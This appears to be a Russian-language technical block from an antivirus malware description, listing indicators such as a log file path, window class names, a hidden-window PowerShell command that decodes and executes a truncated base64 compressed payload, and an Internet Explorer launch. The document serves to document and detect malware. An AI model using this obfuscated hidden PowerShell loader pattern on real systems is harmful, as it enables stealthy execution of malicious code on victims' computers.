Техническая информация
- %APPDATA%\microsoft\windows\templates\log.txt
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -NonI -W Hidden -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('7Vr/ciJXdv57tmrfgWVVtrRGGJBAjF2TzUU0II8a1PwcsJ2tpmm3...' (со скрытым окном)
- '%ProgramFiles%\internet explorer\iexplore.exe' -Embedding